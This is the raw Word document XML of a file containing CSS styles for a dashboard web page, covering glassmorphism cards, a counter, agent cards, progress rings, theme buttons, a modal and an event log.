    <w:p w14:paraId="6E4224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box-sizing: border-box;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A82FF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EA350E0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A624B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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE11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font-family: 'Inter', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231F2C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var(--bg-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE919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color: var(--text-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72939B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min-height: 100vh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BF26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overflow-x: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77433D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all 0.5s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A33C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663E5A6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316DDD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PARTICLES BACKGROUND === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDA73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#particles-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E9F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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639206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top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7414E5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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A964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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D709C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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4441AF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-1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EF10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pointer-events: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C566F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AED5CCB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0DB3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GLASSMORPHISM CARDS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9936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.card-3d {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD495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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097AD7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backdrop-filter: blur(20px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A5A0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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FE7C1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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EB82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2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4306DE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box-shadow: var(--shadow-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798911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all 0.4s cubic-bezier(0.175, 0.885, 0.32, 1.275);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A815E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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702496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overflow: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B905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3148B6A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="063536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.card-3d::before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42833E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content: '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40109F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absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C0CF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top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F73F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-100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635951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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74895A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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54652E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linear-gradient(90deg, transparent, rgba(255,255,255,0.1), transparent);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ACD7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left 0.6s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D8BE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B0ABF55" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665B14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.card-3d:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F388A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translateY(-10px) scale(1.02);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4732C8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box-shadow: 0 20px 60px var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250F5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border-color: var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E2EA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A3C9D93" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0275F9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.card-3d:hover::before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0303C3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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4260FA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D758A49" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4146C3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MEGA COUNTER === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BF1D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.mega-counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ED61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text-align: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B00A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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8743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3rem 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69391D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F2B8896" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5423CB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.mega-counter::before {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3321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content: '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5088A9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absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB09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top: -2px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7932BE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-2px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC40C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right: -2px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0EFB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bottom: -2px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD17B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conic-gradient(from 0deg, var(--accent-primary), var(--accent-secondary), var(--accent-tertiary), var(--accent-primary));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0288B3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22px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5164EC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-1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CBE8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animation: rotate 4s linear infinite;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549503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3B9999E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="324749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.mega-counter-number {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EC93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font-family: 'Orbitron', monospace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D0F2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font-size: 4rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C04F6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font-weight: 900;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756C66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linear-gradient(45deg, var(--accent-primary), var(--accent-secondary), var(--accent-tertiary));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB029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background-size: 300% 300%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F7B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-webkit-background-clip: text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256DFC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-webkit-text-fill-color: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077DA6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background-clip: text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A60C6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animation: gradient-shift 3s ease-in-out infinite, pulse-glow 2s ease-in-out infinite;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAA80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text-shadow: 0 0 30px var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410E7E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41F07B8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1577F9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.mega-counter-label {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A223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font-size: 1.2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539E7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color: var(--text-secondary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19855E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margin-top: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7E98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text-transform: uppercase;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA643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letter-spacing: 3px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78672B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font-weight: 600;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FFAF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3EF0B4F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3491D2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.uptime-display {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5957B5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font-family: 'Orbitron', monospace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DFE8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font-size: 1.1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE7A9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color: var(--accent-secondary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5311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margin-top: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E26E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0B655C8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E05AA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AGENT CARDS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6530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.agent-card {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0705C7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cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D3BC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text-align: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CED4F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70A82FE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19502C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.agent-icon {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D3AF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font-size: 3rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF54B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margin-bottom: 1.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6FEF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display: block;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B0C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filter: drop-shadow(0 0 20px currentColor);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1F00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67630FE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F4271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.core-agent { color: #FF6B6B; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131713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.learn-agent { color: #9333EA; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748D5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.guard-agent { color: #00F5FF; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4045F672" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570C3B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PROGRESS RINGS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5067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.progress-ring {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268EBF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120px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65F5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120px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8C4D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margin: 1rem auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309702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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C45BE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AB6CF0B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22318E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.progress-ring svg {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62318C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rotate(-90deg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DEEE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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005EA7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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A428C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604A897" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BC4A2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.progress-ring .ring-bg {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319981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fill: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690CD6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stroke: rgba(255,255,255,0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8018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stroke-width: 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4949A4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93F537F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D72F0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.progress-ring .ring-progress {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6EFB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fill: none;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B56D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stroke-width: 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3C44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stroke-linecap: round;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F297C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stroke-dasharray: 314;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A624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stroke-dashoffset: 314;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1CC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stroke-dashoffset 1.5s cubic-bezier(0.4, 0, 0.2, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DCD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56A7F56" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A3B0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.progress-ring .ring-text {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBFA9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absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C493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top: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5A03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50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E55E1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translate(-50%, -50%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB911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font-family: 'Orbitron', monospace;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DFE8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font-size: 1.2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF5FA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font-weight: bold;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E1C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6D9DE46" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F311D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THEME SELECTOR === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50A5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.theme-selector {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D9A9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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235457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top: 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2E4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right: 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051C1E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1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CEFD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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E94F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gap: 0.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0692DD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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B46D8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backdrop-filter: blur(20px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DF134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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F467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15px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236AD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0.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B090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E93E96A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B6E70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.theme-btn {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DB2B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40px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510DD4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40px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA8A3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10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528B70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border: 2px solid transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5ECC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cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D359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all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141914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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214708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D20C100" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C98EF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.theme-btn.active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0225D4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border-color: var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005923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box-shadow: 0 0 20px var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B401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2B322B0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D46C0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.theme-btn:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E45BE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scale(1.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A93E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BC67890" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080C1F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.theme-luxury-glass-btn { background: linear-gradient(45deg, #F4D03F, #2ECC71); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54234C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.theme-quantum-void-btn { background: linear-gradient(45deg, #9c27b0, #e91e63); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692D25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.theme-neural-twilight-btn { background: linear-gradient(45deg, #3498db, #1abc9c); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F7DA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.theme-cyber-aurora-btn { background: linear-gradient(45deg, #00ff7f, #00f5ff); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694D8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.theme-transcendental-light-btn { background: linear-gradient(45deg, #6C3483, #F4D03F); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27309322" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D894C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MODAL === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673E34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.modal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E32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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B0E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top: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C474B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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66364C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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2973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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F95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rgba(0,0,0,0.8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558789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backdrop-filter: blur(10px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB77A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2000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D3C2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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE096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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19081C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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748F5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opacity: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F848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visibility: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F768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all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7579A6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6F26B01" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CFFE3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.modal.active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBDD8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opacity: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A86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visibility: visible;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378222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677C1F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B584E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.modal-content {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DAEC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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABDD9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backdrop-filter: blur(20px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705CC0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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314312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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7538A6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2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19581E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max-width: 600px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649D59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90%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A3D6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max-height: 80vh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03931C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overflow-y: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBEB9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scale(0.8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E198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transform 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619373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0D539AD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1285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.modal.active .modal-content {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4492AF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scale(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A73F5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DAF9031" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333B9F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MICRO UPDATE === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11756D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.micro-update {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6104F0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position: fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1585C5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top: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4806DA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left: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E742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translate(-50%, -50%) scale(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FFEF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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409FFD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backdrop-filter: blur(20px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D538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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC7E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15px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B5F2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1rem 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002861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z-index: 1500;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283317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all 0.3s cubic-bezier(0.68, -0.55, 0.265, 1.55);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B23A7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box-shadow: var(--shadow-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D328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CD6B3B1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B856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.micro-update.show {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E41E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translate(-50%, -50%) scale(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576286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9BEC30B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264D81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EVENT LOG === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065B78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.event-log {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3459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max-height: 300px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394A53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overflow-y: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737A92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1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405834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2D1E9CF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0373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.event-item {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116682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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A589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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9222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padding: 0.75rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A35D6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margin-bottom: 0.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FBC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rgba(255,255,255,0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756DEA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10px;</w:t>
      </w:r>
